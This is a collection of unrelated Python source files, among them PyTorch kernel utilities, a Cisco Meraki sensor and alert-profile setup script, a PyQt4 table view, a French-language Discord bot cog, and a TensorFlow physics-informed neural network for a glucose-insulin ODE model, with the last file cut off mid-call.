    """Center features of a kernel by pre- and post-multiplying by the centering matrix H.

    In other words, if k_ij is dot(x_i, x_j), the result will be
    dot(x_i - mu_x, x_j - mu_x).

    :param k: a n by n Gram matrix of inner products between xs
    :return: a n by n centered matrix
    :raises ValueError: if k is not square
    """
    n = k.size()[0]
    if k.size() != (n, n):
        raise ValueError(
            f"Expected k to be nxn square matrix, but it has size {k.size()}"
        )
    # H = I - J/n, where J is the all-ones matrix.
    identity = torch.eye(n, device=k.device, dtype=k.dtype)
    mean_projector = torch.ones((n, n), device=k.device, dtype=k.dtype) / n
    centering = identity - mean_projector
    return centering @ k @ centering
class Kernel(object):
    """Abstract base class for kernels that produce Gram matrices.

    Subclasses implement _call_impl (the kernel computation) and string_id
    (a stable textual identifier).
    """

    def __call__(
        self, x: torch.Tensor, y: Union[None, torch.Tensor] = None
    ) -> torch.Tensor:
        # Symmetric case k(x, x) when no second argument is given.
        y = x if y is None else y
        if x.size()[0] != y.size()[0]:
            raise ValueError("Mismatch in first dimension of x and y")
        return self._call_impl(x, y)

    def _call_impl(self, x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
        raise NotImplementedError("Kernel._call_impl must be implemented by a subclass")

    def string_id(self):
        raise NotImplementedError("Kernel.name must be implemented by a subclass")
class SumKernel(Kernel):
    """Weighted sum of kernels: K(x, y) = sum_i w_i * K_i(x, y).

    Weights default to all ones when not supplied.
    """

    def __init__(self, kernels: Iterable[Kernel], weights=None):
        super(SumKernel, self).__init__()
        self.kernels = list(kernels)
        if weights is None:
            self.weights = torch.ones(len(self.kernels))
        else:
            self.weights = torch.tensor(weights)

    def _call_impl(self, x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
        # Seed the accumulator with the first term, then fold in the rest.
        total = self.weights[0] * self.kernels[0](x, y)
        for weight, kernel in zip(self.weights[1:], self.kernels[1:]):
            total = total + kernel(x, y) * weight
        return total

    def string_id(self):
        inner = '+'.join(k.string_id() for k in self.kernels)
        return f"SumKernel[{inner}]"
| 1,971 | 695 |
#!/usr/bin/env python3
"""Copyright (c) 2020 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Cisco Sample
Code License, Version 1.1 (the "License"). You may obtain a copy of the
License at
https://developer.cisco.com/docs/licenses
All use of the material herein must be in accordance with the terms of
the License. All rights not expressly granted by the License are
reserved. Unless required by applicable law or agreed to separately in
writing, software distributed under the License is distributed on an "AS
IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied."""
import csv
import sys
from meraki_functions import *
from env import *
# --- Claim sensors into their networks and set their details -----------------
# sensors.csv rows name an organization, network, sensor serial, device name
# and location.  Any API failure aborts the run with a non-zero exit code.
networks = {}  # dictionary will map network names to network ids
networks_to_organizations = {}  # dictionary will map networks to their organizations
with open("sensors.csv", "r") as sensors_file:
    csv_reader = csv.DictReader(sensors_file)
    for row in csv_reader:
        org_id = getOrgID(base_url, headers, row["organization"])
        if org_id is None:
            # BUG FIX: the original message had no {} placeholder, so the
            # organization name was silently dropped from the output.
            print("No organization exists with the name {}".format(row["organization"]))
            sys.exit(1)
        net_id = getNetworkID(base_url, headers, org_id, row["network"])
        if net_id is None:
            print("No network exists in the organization with ID {} with the name {}".format(org_id, row["network"]))
            sys.exit(1)
        networks[row["network"]] = net_id  # the key row["network"] is the network name
        networks_to_organizations[net_id] = org_id
        serial = row["serial"]
        status_code = claimDevicesToNetwork(base_url, headers, net_id, [serial])
        if status_code != 200:
            print("{} Error".format(status_code))
            print("There was an error adding the device: {} to the network with ID {}.".format(serial, net_id))
            sys.exit(1)
        sensor_details = {
            "name": row["name"],
            "address": row["location"]
        }
        status_code = editDeviceDetails(base_url, headers, serial, sensor_details)
        if status_code != 200:
            print("{} Error".format(status_code))
            print("There was an error editing the device {} with these details: {}".format(serial, sensor_details))
            sys.exit(1)
        print("Sensor {} was added to network {}".format(serial, row["network"]))

# --- Map each alert profile name to the sensor serials it should cover -------
sensors_to_profiles = {}
with open("sensors_to_profiles.csv", "r") as sensor_profile_file:
    csv_reader = csv.DictReader(sensor_profile_file)
    for row in csv_reader:
        # setdefault creates the list on first sight of a profile, then appends.
        sensors_to_profiles.setdefault(row["alert_profile"], []).append(row["sensor_serial"])

# --- Map network name -> alert profile name -> recipient emails --------------
# Data structure example:
# profiles_to_recipients = {
#     "network name": {
#         "alert profile": ["email", "email", "email"],
#         "alert profile": ["email", "email", "email"]
#     }
# }
profiles_to_recipients = {}
with open("alert_recipients.csv", "r") as alert_recipients_file:
    csv_reader = csv.DictReader(alert_recipients_file)
    for row in csv_reader:
        profile_name = row["alert_profile"]
        net_name = row["network"]
        recipient = row["email"]  # the recipient is defined by an email address
        # Nested setdefault replaces the original two-level if/else ladder.
        profiles_to_recipients.setdefault(net_name, {}).setdefault(profile_name, []).append(recipient)

# --- Create one temperature alert profile per alert_profiles.csv row ---------
with open("alert_profiles.csv", "r") as alert_profile_file:
    csv_reader = csv.DictReader(alert_profile_file)
    for row in csv_reader:
        temp_threshold = row["temp_threshold"]
        temp_duration = row["temp_duration"]
        profile_name = row["name"]
        net_name = row["network"]
        net_id = networks[net_name]
        org_id = networks_to_organizations[net_id]
        serials = sensors_to_profiles[profile_name]
        alert_profile_details = {
            "name": profile_name,
            "scheduleId": "",
            "conditions": [
                {
                    "type": "temperature",
                    "unit": "fahrenheit",
                    "direction": "+",
                    "threshold": temp_threshold,
                    "duration": temp_duration
                }
            ],
            "recipients": {
                "emails": profiles_to_recipients[net_name][profile_name],
                "snmp": False,
                "allAdmins": False,
                "smsNumbers": [],
                "httpServerIds": [],
                "pushUserIds": []
            },
            "serials": serials
        }
        status_code = createAlertProfile(base_url, headers, net_id, alert_profile_details)
        if status_code != 201:
            print("Error {}".format(status_code))
            print("There was an issue creating the alert profile: {} to the network with ID {}".format(alert_profile_details, net_id))
            # Consistency fix: every other API failure aborts the run; without
            # this exit the script still printed the success line below.
            sys.exit(1)
        print("Alert profile {} was added to the network {}".format(profile_name, net_name))
| 6,253 | 1,827 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
class MyTabView(QTableView):
    """Table view backed by a 4x2 QStandardItemModel that logs double-clicked cells."""

    def __init__(self, parent=None):
        super(MyTabView, self).__init__(parent)
        # NOTE(review): assigning to self.model shadows QTableView.model();
        # kept as-is so existing callers accessing .model keep working.
        self.model = QStandardItemModel(4, 2)
        self.setModel(self.model)

    def mouseDoubleClickEvent(self, event):
        """Run the default handling, then report which cell was clicked."""
        QTableView.mouseDoubleClickEvent(self, event)
        pos = event.pos()
        index = self.indexAt(pos)
        # BUG FIX: QModelIndex instances are always truthy, so `if item:`
        # also fired for double-clicks outside any cell (row/column -1).
        # isValid() is the documented way to test for a real item.
        if index.isValid():
            print ("item clicked at ", index.row(), " ", index.column())
if __name__ == '__main__':
    import sys

    # Minimal manual test harness: show the view inside a bare widget.
    application = QApplication(sys.argv)
    window = QWidget()
    window.resize(1024, 768)
    view = MyTabView(window)
    window.show()
    application.exec_()
import logging
from itertools import cycle
import discord
from discord.ext import commands, tasks
from pyboss.controllers.guild import GuildController
from .utils import youtube
from .utils.checkers import is_guild_owner
logger = logging.getLogger(__name__)
class Commands(commands.Cog):
    # General-purpose guild commands: presence rotation, moderation helpers
    # and member profile display.  The command docstrings are user-facing
    # help text (shown by the help command) and are deliberately kept in
    # French; the class itself has no docstring because discord.py would
    # surface one as the cog description.

    def __init__(self, bot):
        self.bot = bot
        # Default presence advertises the help command; cycled by loop_status.
        self.status = cycle((discord.Game(name=f"{bot.command_prefix}help"),))

    @commands.command(aliases=["status"])
    @commands.guild_only()
    @is_guild_owner()
    async def change_status(self, ctx, *params):
        """
        Change le status du bot par des vidéos correspondantes à la recherche
        """
        query = " ".join(params)
        videos = [discord.Streaming(**video) for video in youtube.search(query, n=50)]
        if videos:
            self.status = cycle(videos)
        else:
            # BUG FIX: ctx.send() is a coroutine; without `await` the
            # "no video found" message was never actually sent.
            await ctx.send("Aucune vidéo n'a été trouvée")

    @tasks.loop(seconds=30)
    async def loop_status(self):
        # Rotate the bot presence every 30 seconds through self.status.
        try:
            await self.bot.change_presence(activity=next(self.status))
        except discord.errors.HTTPException:
            logger.error("Can't change bot presence")

    @commands.Cog.listener("on_ready")
    async def before_loop_status(self):
        # Start the presence rotation once the bot is connected.
        self.loop_status.start()

    @commands.command()
    @commands.guild_only()
    async def clear(self, ctx, n=1):
        """
        Supprime les n message du salon
        """
        # +1 so the invoking command message is deleted as well.
        await ctx.channel.purge(limit=int(n) + 1)

    @commands.command()
    @commands.guild_only()
    async def send(self, ctx, *params):
        """
        Envoie un message dans le salon actuel
        """
        await ctx.send(" ".join(params))
        await ctx.message.delete()

    @commands.command()
    @commands.guild_only()
    async def profile(self, ctx, mention=None):
        """
        Consulter les infos d'un membre
        """
        # BUG FIX: ctx.author.id is an int, so calling .isdigit() on it raised
        # AttributeError whenever the command was used without a mention;
        # normalise to str first.  (The old name `id` also shadowed the builtin.)
        member_id = mention.strip("<>!?@&") if mention else str(ctx.author.id)
        if not member_id.isdigit():
            await ctx.send(f"{mention} est incorrect")
        elif member := GuildController(ctx.guild).get_member_by_id(int(member_id)):
            embed = discord.Embed(title="Profil", colour=0xFFA325)
            embed.set_author(name=member.name)
            embed.set_thumbnail(url=member.avatar_url)
            embed.add_field(name="Name", value=member.mention, inline=True)
            embed.add_field(name="Level", value=member.level, inline=True)
            embed.add_field(name="XP", value=member.XP, inline=True)
            embed.add_field(
                name="Membre depuis...",
                value=f"{member.joined_at:%d/%m/%Y}",
                inline=True,
            )
            await ctx.send(embed=embed)

    # TODO: add embed_send command and LaTeX command like Texit bot
def setup(bot):
    """discord.py extension entry point: register the Commands cog on *bot*."""
    bot.add_cog(Commands(bot))
| 2,868 | 893 |
import tensorflow as tf
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from plotting import newfig, savefig
import matplotlib.gridspec as gridspec
import seaborn as sns
import time
from utilities import neural_net, fwd_gradients, heaviside, \
tf_session, mean_squared_error, relative_error
class HiddenPathways:
    """Physics-informed neural network for a six-species glucose-insulin model.

    A dense network maps (scaled) time to the six state variables.  Training
    minimises a weighted sum of (i) the data misfit on the glucose species
    (column 2), (ii) the ODE residuals assembled in ``SysODE`` and (iii) an
    auxiliary misfit on the final data point.  Parameters stored as ``log*``
    tf.Variables are learned jointly with the network (log-space keeps them
    positive); the plain tf.Variables are held fixed.  TensorFlow 1.x
    graph/session style throughout.
    """

    # Initialize the class
    def __init__(self, t_data, S_data, t_eqns, layers, meal_tq):
        """Build the TF graph: network, ODE residuals, losses, optimizers.

        t_data, S_data: observation times and species values (N x D).
        t_eqns: collocation times where the ODE residual is enforced.
        layers: network layer widths.
        meal_tq: [meal times, meal amounts], one row per collocation point.
        """
        self.D = S_data.shape[1]

        self.t_min = t_data.min(0)
        self.t_max = t_data.max(0)
        # self.S_scale = tf.Variable(np.array(self.D*[1.0]), dtype=tf.float32, trainable=False)
        # Per-species scales used to nondimensionalise the losses.
        self.S_scale = S_data.std(0)

        # data on all the species (only some are used as input)
        self.t_data, self.S_data = t_data, S_data
        self.t_eqns = t_eqns

        # layers
        self.layers = layers

        # Meal times mapped into the network's scaled time coordinate [-1, 1].
        self.mt = 2.0*(meal_tq[0] - self.t_min)/(self.t_max - self.t_min) - 1.0
        self.mq = meal_tq[1]

        # Fixed (non-trainable) model parameters.  The commented-out lines
        # record alternative configurations where these were learned instead.
        # self.k = tf.Variable(1.0/120.0, dtype=tf.float32, trainable=False)
        self.Rm = tf.Variable(209.0/100.0, dtype=tf.float32, trainable=False)
        self.Vg = tf.Variable(10.0, dtype=tf.float32, trainable=False)
        self.C1 = tf.Variable(300.0/100.0, dtype=tf.float32, trainable=False)
        self.a1 = tf.Variable(6.6, dtype=tf.float32, trainable=False)
        # self.Ub = tf.Variable(72.0/100.0, dtype=tf.float32, trainable=False)
        # self.C2 = tf.Variable(144.0/100.0, dtype=tf.float32, trainable=False)
        # self.U0 = tf.Variable(4.0/100.0, dtype=tf.float32, trainable=False)
        # self.Um = tf.Variable(90.0/100.0, dtype=tf.float32, trainable=False)
        # self.C3 = tf.Variable(100.0/100.0, dtype=tf.float32, trainable=False)
        # self.C4 = tf.Variable(80.0/100.0, dtype=tf.float32, trainable=False)
        self.Vi = tf.Variable(11.0, dtype=tf.float32, trainable=False)
        self.E = tf.Variable(0.2, dtype=tf.float32, trainable=False)
        self.ti = tf.Variable(100.0, dtype=tf.float32, trainable=False)
        # self.beta = tf.Variable(1.772, dtype=tf.float32, trainable=False)
        # self.Rg = tf.Variable(180.0/100.0, dtype=tf.float32, trainable=False)
        # self.alpha = tf.Variable(7.5, dtype=tf.float32, trainable=False)
        self.Vp = tf.Variable(3.0, dtype=tf.float32, trainable=False)
        # self.C5 = tf.Variable(26.0/100.0, dtype=tf.float32, trainable=False)
        self.tp = tf.Variable(6.0, dtype=tf.float32, trainable=False)
        # self.td = tf.Variable(12.0, dtype=tf.float32, trainable=False)

        # Trainable parameters, optimised in log-space so they stay positive.
        self.logk = tf.Variable(-6.0, dtype=tf.float32, trainable=True)
        # self.logRm = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        # self.logVg = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        # self.logC1 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        # self.loga1 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logUb = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logC2 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logU0 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logUm = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logC3 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logC4 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        # self.logVi = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        # self.logE = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        # self.logti = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logbeta = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logRg = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logalpha = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        # self.logVp = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logC5 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        # self.logtp = tf.Variable(0.0, dtype=tf.float32, trainable=True)
        self.logtd = tf.Variable(0.0, dtype=tf.float32, trainable=True)

        self.var_list_eqns = [self.logk, self.logUb,
                              self.logC2, self.logU0, self.logUm, self.logC3, self.logC4,
                              self.logbeta, self.logRg, self.logalpha, self.logC5,
                              self.logtd]

        # Positive parameter values recovered from their logs.  NOTE: these
        # rebind the names above, so the trainable parameters shadow any
        # same-named fixed Variable from here on.
        self.k = tf.exp(self.logk)
        # self.Rm = tf.exp(self.logRm)
        # self.Vg = tf.exp(self.logVg)
        # self.C1 = tf.exp(self.logC1)
        # self.a1 = tf.exp(self.loga1)
        self.Ub = tf.exp(self.logUb)
        self.C2 = tf.exp(self.logC2)
        self.U0 = tf.exp(self.logU0)
        self.Um = tf.exp(self.logUm)
        self.C3 = tf.exp(self.logC3)
        self.C4 = tf.exp(self.logC4)
        # self.Vi = tf.exp(self.logVi)
        # self.E = tf.exp(self.logE)
        # self.ti = tf.exp(self.logti)
        self.beta = tf.exp(self.logbeta)
        self.Rg = tf.exp(self.logRg)
        self.alpha = tf.exp(self.logalpha)
        # self.Vp = tf.exp(self.logVp)
        self.C5 = tf.exp(self.logC5)
        # self.tp = tf.exp(self.logtp)
        self.td = tf.exp(self.logtd)

        # placeholders for data
        self.t_data_tf = tf.placeholder(tf.float32, shape=[None, 1])
        self.S_data_tf = tf.placeholder(tf.float32, shape=[None, self.D])
        self.t_eqns_tf = tf.placeholder(tf.float32, shape=[None, 1])
        self.mt_tf = tf.placeholder(tf.float32, shape=[None, self.mt.shape[1]])
        self.mq_tf = tf.placeholder(tf.float32, shape=[None, self.mq.shape[1]])
        self.learning_rate = tf.placeholder(tf.float32, shape=[])

        # physics uninformed neural networks
        self.net_sysbio = neural_net(layers=self.layers)

        # Prediction anchored at the first observation: the (H+1) factor makes
        # the network correction vanish at t = t_min.
        self.H_data = 2.0*(self.t_data_tf - self.t_min)/(self.t_max - self.t_min) - 1.0
        self.S_data_pred = self.S_data[0,:] + self.S_scale*(self.H_data+1.0)*self.net_sysbio(self.H_data)

        # physics informed neural networks
        self.H_eqns = 2.0*(self.t_eqns_tf - self.t_min)/(self.t_max - self.t_min) - 1.0
        self.S_eqns_pred = self.S_data[0,:] + self.S_scale*(self.H_eqns+1.0)*self.net_sysbio(self.H_eqns)
        self.E_eqns_pred, self.IG = self.SysODE(self.S_eqns_pred, self.t_eqns_tf,
                                                self.H_eqns, self.mt_tf, self.mq_tf)

        # Adaptive S_scale
        # self.S_scale = 0.9*self.S_scale + 0.1*tf.math.reduce_std(self.S_eqns_pred, 0)
        # scale_list = tf.unstack(self.S_scale)
        # scale_list[2] = self.S_data.std(0)[2]
        # self.S_scale = tf.stack(scale_list)

        # loss
        # Data misfit only on species 2 (glucose); the auxiliary term pins the
        # final observation for every species.
        self.loss_data = mean_squared_error(self.S_data_tf[:,2:3]/self.S_scale[2:3], self.S_data_pred[:,2:3]/self.S_scale[2:3])
        self.loss_eqns = mean_squared_error(0.0, self.E_eqns_pred/self.S_scale)
        self.loss_auxl = mean_squared_error(self.S_data_tf[-1,:]/self.S_scale, self.S_data_pred[-1,:]/self.S_scale)
        self.loss = 0.99*self.loss_data + 0.01*self.loss_eqns + 0.01*self.loss_auxl

        # optimizers
        # Network weights use the externally supplied learning rate; the
        # physical log-parameters use their own fixed-rate Adam optimizer.
        self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
        self.optimizer_para = tf.train.AdamOptimizer(learning_rate=0.001)
        self.train_op = self.optimizer.minimize(self.loss,
                                                var_list=[self.net_sysbio.weights,
                                                          self.net_sysbio.biases,
                                                          self.net_sysbio.gammas])
        self.trainpara_op = self.optimizer_para.minimize(self.loss,
                                                         var_list=self.var_list_eqns)
        self.sess = tf_session()

    def SysODE(self, S, t, H, mt, mq):
        """Return the ODE residuals E = dS/dt - F(S) and the glucose intake IG.

        S: predicted species at the collocation points; t: the time
        placeholder (differentiated against); H: scaled time in [-1, 1];
        mt, mq: scaled meal times and amounts, one column per meal.
        """
        # Per-meal gut absorption: switched on by the heaviside step at the
        # meal time, then decaying exponentially at rate k (the (t_max-t_min)/2
        # factor converts the decay back to unscaled time units).
        intake = self.k * mq * heaviside(H-mt) * tf.exp(self.k*(mt-H)*(self.t_max-self.t_min)/2.0)
        IG = tf.reduce_sum(intake, axis=1, keepdims=True)
        kappa = 1.0/self.Vi + 1.0/(self.E*self.ti)
        # f1..f4: sigmoidal secretion/utilisation response terms.
        f1 = self.Rm * tf.sigmoid(S[:,2:3]/(self.Vg*self.C1) - self.a1)
        f2 = self.Ub * (1.0 - tf.exp(-S[:,2:3]/(self.Vg*self.C2)))
        # Guard: tf.log of a non-positive network output would produce NaNs
        # during early training, so clamp those inputs to 1.
        safe_log = tf.where(S[:,1:2] <= 0.0, tf.ones_like(S[:,1:2]), S[:,1:2])
        f3 = (self.U0 + self.Um*tf.sigmoid(self.beta*tf.log(kappa*safe_log/self.C4))) / (self.Vg*self.C3)
        f4 = self.Rg * tf.sigmoid(-self.alpha*(S[:,5:6]/(self.Vp*self.C5)-1.0))
        # State equations: columns 0-1 are two insulin compartments coupled by
        # exchange rate E, column 2 is glucose, columns 3-5 a delay chain.
        F0 = f1 - self.E*(S[:,0:1]/self.Vp-S[:,1:2]/self.Vi) - S[:,0:1]/self.tp
        F1 = self.E*(S[:,0:1]/self.Vp-S[:,1:2]/self.Vi) - S[:,1:2]/self.ti
        F2 = f4 + IG - f2 - f3*S[:,2:3]
        F3 = (S[:,0:1] - S[:,3:4]) / self.td
        F4 = (S[:,3:4] - S[:,4:5]) / self.td
        F5 = (S[:,4:5] - S[:,5:6]) / self.td
        F = tf.concat([F0, F1, F2, F3, F4, F5], 1)
        S_t = fwd_gradients(S, t)
        E = S_t - F
        return E, IG

    def train(self, num_epochs, batch_size, learning_rate):
        """Run minibatch Adam training for num_epochs epochs.

        Every data batch always contains the first and last observations
        (anchoring both trajectory ends) plus a random interior sample.
        """
        N_data = self.t_data.shape[0]
        N_eqns = self.t_eqns.shape[0]
        for epoch in range(num_epochs):
            start_time = time.time()
            for it in range(N_eqns//batch_size):
                idx_data = np.concatenate([np.array([0]),
                                           np.random.choice(np.arange(1, N_data-1), min(batch_size, N_data)-2),
                                           np.array([N_data-1])])
                idx_eqns = np.random.choice(N_eqns, batch_size)
                t_data_batch, S_data_batch = self.t_data[idx_data,:], self.S_data[idx_data,:]
                t_eqns_batch = self.t_eqns[idx_eqns,:]
                mt_batch, mq_batch = self.mt[idx_eqns,:], self.mq[idx_eqns,:]
                tf_dict = {self.t_data_tf: t_data_batch,
                           self.S_data_tf: S_data_batch,
                           self.t_eqns_tf: t_eqns_batch,
                           self.mt_tf: mt_batch, self.mq_tf: mq_batch,
                           self.learning_rate: learning_rate}
                # Joint step: network weights and the physical log-parameters.
                self.sess.run([self.train_op, self.trainpara_op], tf_dict)
                # Print
                if it % 10 == 0:
                    elapsed = time.time() - start_time
                    [loss_data_value,
                     loss_eqns_value,
                     loss_auxl_value,
                     learning_rate_value] = self.sess.run([self.loss_data,
                                                           self.loss_eqns,
                                                           self.loss_auxl,
                                                           self.learning_rate], tf_dict)
                    print('Epoch: %d, It: %d, Loss Data: %.3e, Loss Eqns: %.3e, Loss Aux: %.3e, Time: %.3f, Learning Rate: %.1e'
                          %(epoch, it, loss_data_value, loss_eqns_value, loss_auxl_value, elapsed, learning_rate_value))
                    start_time = time.time()

    def predict(self, t_star, meal_tq):
        """Evaluate the trained network at times t_star.

        NOTE: meal_tq is modified in place — its time component is rescaled
        to the network's [-1, 1] coordinate before feeding.  Returns the
        predicted species with the inferred intake IG appended as an extra
        (seventh) column.
        """
        meal_tq[0] = 2.0*(meal_tq[0] - self.t_min)/(self.t_max - self.t_min) - 1.0
        tf_dict = {self.t_eqns_tf: t_star,
                   self.mt_tf: meal_tq[0], self.mq_tf: meal_tq[1]}
        S_star, IG = self.sess.run([self.S_eqns_pred, self.IG], tf_dict)
        S_star = np.append(S_star[:,:], IG[:], axis=1)
        return S_star
if __name__ == "__main__":

    # Network: 1 input (time) -> six hidden layers of width 6*30 -> 6 species.
    layers = [1] + 6*[6*30] + [6]

    # Meal schedule: times and glucose amounts.
    meal_t = [300., 650., 1100., 2000.]
    meal_q = [60e3, 40e3, 50e3, 100e3]

    def intake(tn, k):
        """Total glucose appearance rate at time tn, summed over all meals."""
        def s(mjtj):
            # One meal (time, amount): switched on at the meal time, then
            # decaying exponentially at rate k.
            return k*mjtj[1]*np.heaviside(tn-mjtj[0], 0.5)*np.exp(k*(mjtj[0]-tn))
        IG = np.array([s(mjtj) for mjtj in list(zip(meal_t, meal_q))]).sum()
        return IG

    # function that returns dx/dt
    def f(x, t): # x is 6 x 1
        """Reference ODE right-hand side with the ground-truth parameters
        (used to synthesise the training data)."""
        k = 1./120.
        Rm = 209.
        Vg = 10.
        C1 = 300.
        a1 = 6.6
        Ub = 72.
        C2 = 144.
        U0 = 4.
        Um = 90.
        C3 = 100.
        C4 = 80.
        Vi = 11.
        E = 0.2
        ti = 100.
        beta = 1.772
        Rg = 180.
        alpha = 7.5
        Vp = 3.
        C5 = 26.
        tp = 6.
        td = 12.
        kappa = 1.0/Vi + 1.0/E/ti
        f1 = Rm / (1.0 + np.exp(-x[2]/Vg/C1 + a1))
        f2 = Ub * (1.0 - np.exp(-x[2]/Vg/C2))
        f3 = (U0 + Um/(1.0+np.exp(-beta*np.log(kappa*x[1]/C4)))) / Vg / C3
        f4 = Rg / (1.0 + np.exp(alpha*(x[5]/Vp/C5-1.0)))
        x0 = f1 - E*(x[0]/Vp-x[1]/Vi) - x[0]/tp
        x1 = E*(x[0]/Vp-x[1]/Vi) - x[1]/ti
        x2 = f4 + intake(t, k) - f2 - f3*x[2]
        x3 = (x[0] - x[3]) / td
        x4 = (x[3] - x[4]) / td
        x5 = (x[4] - x[5]) / td
        X = np.array([x0, x1, x2, x3, x4, x5])
        return X

    # function that returns dx/dt
    def f_pred(x, t): # x is 6 x 1
        """Same ODE but with the parameter values previously inferred by the
        model; only used by the commented-out forecasting block at the end."""
        k = 0.007751
        Rm = 73.858517
        Vg = 10.000000
        C1 = 319.160032
        a1 = 6.253946
        Ub = 86.824888
        C2 = 152.637362
        U0 = 19.412358
        Um = 141.051173
        C3 = 235.955381
        C4 = 251.580667
        Vi = 2.689281
        E = 0.147199
        ti = 36.766254
        beta = 2.475349
        Rg = 212.777472
        alpha = 7.182466
        Vp = 0.707807
        C5 = 101.811242
        tp = 139.384628
        td = 7.417875
        kappa = 1.0/Vi + 1.0/E/ti
        f1 = Rm / (1.0 + np.exp(-x[2]/Vg/C1 + a1))
        f2 = Ub * (1.0 - np.exp(-x[2]/Vg/C2))
        f3 = (U0 + Um/(1.0+np.exp(-beta*np.log(kappa*x[1]/C4)))) / Vg / C3
        f4 = Rg / (1.0 + np.exp(alpha*(x[5]/Vp/C5-1.0)))
        x0 = f1 - E*(x[0]/Vp-x[1]/Vi) - x[0]/tp
        x1 = E*(x[0]/Vp-x[1]/Vi) - x[1]/ti
        x2 = f4 + intake(t, k) - f2 - f3*x[2]
        x3 = (x[0] - x[3]) / td
        x4 = (x[3] - x[4]) / td
        x5 = (x[4] - x[5]) / td
        X = np.array([x0, x1, x2, x3, x4, x5])
        return X

    def plotting(t_star, S_star, S_pred, perm, Vg2, forecast=False):
        """Plot sampled data against the learned trajectories.

        perm: indices of the sampled data points; Vg2: scale factor used to
        restore physical units.  NOTE(review): reads IG_star from the
        enclosing scope (defined below, before the first call).
        """
        sns.set()

        fig, ax = newfig(2.0, 0.7)
        gs0 = gridspec.GridSpec(1, 1)
        gs0.update(top=0.9, bottom=0.15, left=0.1, right=0.95, hspace=0.3, wspace=0.3)
        ax = plt.subplot(gs0[0:1, 0:1])
        ax.plot(t_star,S_star[:,2],'C1',linewidth=2,label='input data')
        ax.scatter(t_star[perm],S_star[perm,2],marker='o',s=40,label='sampled input')
        ax.set_xlabel('$t\ (min)$', fontsize=18)
        ax.set_ylabel('$G\ (mg/dl) $', fontsize=18)
        ax.legend(fontsize='large')

        ####################################
        # Insulin compartments: exact vs. learned.
        fig, ax = newfig(1.8, 0.75)
        gs1 = gridspec.GridSpec(1, 2)
        gs1.update(top=0.85, bottom=0.15, left=0.1, right=0.95, hspace=0.3, wspace=0.3)
        ax = plt.subplot(gs1[0:1, 0:1])
        ax.plot(t_star,S_star[:,0]*Vg2,'C1',linewidth=2,label='exact')
        ax.plot(t_star,S_pred[:,0]*Vg2,'g-.',linewidth=3,label='learned')
        ax.set_xlabel('$t\ (min)$', fontsize=18)
        ax.set_ylabel('$I_p\ (\mu U/ml)$', fontsize=18)
        ax.legend(fontsize='large')

        ax = plt.subplot(gs1[0:1, 1:2])
        ax.plot(t_star,S_star[:,1]*Vg2,'C1',linewidth=2)
        ax.plot(t_star,S_pred[:,1]*Vg2,'g-.',linewidth=3)
        ax.set_xlabel('$t\ (min)$', fontsize=18)
        ax.set_ylabel('$I_i\ (\mu U/ml)$', fontsize=18)

        # Glucose and inferred intake.
        fig, ax = newfig(1.8, 0.75)
        gs2 = gridspec.GridSpec(1, 2)
        gs2.update(top=0.85, bottom=0.15, left=0.1, right=0.95, hspace=0.3, wspace=0.3)
        ax = plt.subplot(gs2[0:1, 0:1])
        if not forecast:
            ax.scatter(t_star[perm],S_star[perm,2],marker='o',c='C1',s=30)
        else:
            ax.plot(t_star,S_star[:,2],'C1',linewidth=2)
        ax.plot(t_star,S_pred[:,2],'g-.',linewidth=3)
        ax.set_xlabel('$t\ (min)$', fontsize=18)
        ax.set_ylabel('$G\ (mg/dl)$', fontsize=18)

        ax = plt.subplot(gs2[0:1, 1:2])
        ax.plot(t_star,IG_star*Vg2,'C1',linewidth=2)
        ax.plot(t_star,S_pred[:,6]*Vg2,'g-.',linewidth=3)
        ax.set_xlabel('$t\ (min)$', fontsize=18)
        ax.set_ylabel('$I_G\ (mg/min)$', fontsize=18)

    # time points
    t_star = np.arange(0, 3000, 1.0)
    N = t_star.shape[0]
    N_eqns = N
    N_data = N // 5

    k = 1./120.
    Vp = 3.0
    Vi = 11.0
    Vg2 = 10.0*10.0
    # Initial conditions, scaled by compartment volumes.
    S0 = 12.0*Vp
    S1 = 4.0*Vi
    S2 = 110.0*Vg2
    S3 = 0.0
    S4 = 0.0
    S5 = 0.0

    # initial condition
    x0 = np.array([S0, S1, S2, S3, S4, S5]).flatten()

    # solve ODE
    S_star = odeint(f, x0, t_star)
    S_star /= Vg2 # scaling by Vg^2
    IG_star = np.array([intake(t, k) for t in t_star]) / Vg2

    t_train = t_star[:,None]
    S_train = S_star

    # two-point data must be given for all the species
    # 1st: initial at t=0; 2nd: any point between (0,T]
    N0 = 0
    N1 = N - 1
    idx_data = np.concatenate([np.array([N0]),
                               np.random.choice(np.arange(1, N-1), size=N_data, replace=False),
                               np.array([N-1]),
                               np.array([N1])])
    idx_eqns = np.concatenate([np.array([N0]),
                               np.random.choice(np.arange(1, N-1), size=N_eqns-2, replace=False),
                               np.array([N-1])])

    # Meal schedule broadcast to one row per collocation point (amounts are
    # rescaled by Vg2 like the species data).
    meal_tq = [np.array([N_eqns*[x] for x in meal_t]).T,
               np.array([N_eqns*[x/Vg2] for x in meal_q]).T]

    model = HiddenPathways(t_train[idx_data],
                           S_train[idx_data,:],
